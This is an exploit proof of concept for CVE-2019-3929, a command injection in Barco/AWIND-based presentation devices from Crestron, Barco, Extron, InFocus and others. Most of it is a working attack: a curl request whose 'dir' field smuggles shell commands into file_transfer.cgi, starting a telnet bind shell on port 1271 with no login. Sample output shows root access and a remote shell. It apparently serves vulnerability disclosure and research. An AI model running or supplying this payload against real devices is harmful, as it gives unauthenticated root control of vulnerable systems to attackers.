Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection

`##  
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection   
# Date: 05/01/2019  
# Exploit Author: Jacob Baines  
# Tested on: Crestron AM-100 1.6.0.2  
# CVE : CVE-2019-3929  
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k  
# Advisory: https://www.tenable.com/security/research/tra-2019-20  
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c  
# Affected Vendors/Device/Firmware:  
# - Crestron AM-100 1.6.0.2  
# - Crestron AM-101 2.7.0.1  
# - Barco wePresent WiPG-1000P 2.3.0.10  
# - Barco wePresent WiPG-1600W before 2.4.1.19  
# - Extron ShareLink 200/250 2.0.3.4  
# - Teq AV IT WIPS710 1.1.0.7  
# - InFocus LiteShow3 1.0.16  
# - InFocus LiteShow4 2.0.0.7  
# - Optoma WPS-Pro 1.0.0.5  
# - Blackbox HD WPS 1.0.0.5  
# - SHARP PN-L703WA 1.4.2.3  
##  
  
The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:  
  
curl --header "Content-Type: application/x-www-form-urlencoded" \  
--request POST \  
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \  
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi  
  
Example:  
  
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi  
root  
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271  
Trying 192.168.88.250...  
Connected to 192.168.88.250.  
Escape character is '^]'.  
  
~/boa/cgi-bin #  
`